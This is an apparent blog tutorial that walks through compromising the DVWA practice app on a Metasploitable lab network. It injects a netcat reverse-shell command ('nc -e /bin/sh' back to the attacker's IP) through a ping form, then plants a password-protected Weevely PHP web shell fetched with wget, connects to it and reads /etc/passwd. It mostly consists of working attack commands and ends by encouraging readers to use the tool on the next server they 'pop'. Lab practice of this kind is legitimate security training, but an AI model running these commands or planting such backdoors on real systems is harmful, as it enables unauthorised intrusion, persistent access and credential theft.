Create a Persistent Back Door with Kali, Netcat and Weevely

1 Comment

This post will dive into how we can take advantage of a vulnerability in a web application to gain access and upload a backdoor that we can connect to in the future.

As always, this post is for educational purposes and should not be used on live networks. So we are using our internal network for this demonstration.

network

We will be creating a backdoor in DVWA Command Execution module, which is a web app on Metasploitable.

wee1

To start with, change the security settings from high to low on DVWA Security Tab above.

wee2

Next we will need to move to the Command Execution module. The page just does a ping scan. so let’s try it.

wee3

We will enter an IP address and click on submit.

wee4

Let see if it will also run other commands other than ping. We will try to run a Netcat command in the text box so on the Kali machine command line type:

nc -vv -l -p 8888

8888 is the port we want to listen on

wee5

Next, in DVWA, type any IP then ; then nc -e /bin/sh 192.168.56.103 8888 and connect with Kali machine from website as seen below.

wee6

Connection established, we have full control of the web app.

wee7

 

Now we have full command line controls on the website we can run any commands we wish. We want to create a persistent back door now and upload it to the website.

First we need to generate a backdoor with Weevely, back on the Kali machine, in a new console window type:

weevely generate 123456 /root/shell.txt

123456 will be our password which we will use later.

wee8

Copy it to:

cp /root/shell.txt /var/www/html

so we can see it in our browser.

wee9

Make sure it’s copied. shell.txt is in /var/www/html. We can see shell.txt on the right hand side.

wee10

Next we start the server on the Kali machine. Start the server:

service apache2 start

wee11

On Kali browser go to 192.168.56.103/shell.txt or localhost/shell.txt to confirm file is there.

wee12

We still  have a netcat connection on the server so we can wget our shell.txt file:

wget http://192.168.56.103/shell.txt

and the shell.txt should show uploaded

wee13

The file has been uploaded, next we need to change it to php extension for it to run.

Mv shell.txt shell.php

wee18

Connect to the upload in Kali:

weevely http://192.168.56.101/dvwa/vulnerabilities/shell.php 123456

 

wee20

We are connected with a backdoor in DVWA. NOW we have the backdoor in DVWA we can run some helpful commands, for instance.

:help

this will give you a list of commands you can run on your back door. Interesting ones are:

:system_info

wee21

cat /etc/passwd

wee22

Another interesting command we can use is :

audit_etcpasswd -vector <option>

To upload a file to the target system:

:file_download rpath

is remote path and lpath for local.

So have a play around with Weevely when you pop your next server.

Thanks for reading and don’t forget to comment, like and of course, follow our blog for future tutorials.

QuBits 2018-09-13

Advertisement

1 Comment

  1. Pingback: Create a Backdoor Shell in Python – ls /blog

Leave a Reply

Please log in using one of these methods to post your comment:

Gravatar
WordPress.com Logo

You are commenting using your WordPress.com account. Log Out /  Change )

Twitter picture

You are commenting using your Twitter account. Log Out /  Change )

Facebook photo

You are commenting using your Facebook account. Log Out /  Change )

Cancel

Connecting to %s

This site uses Akismet to reduce spam. Learn how your comment data is processed.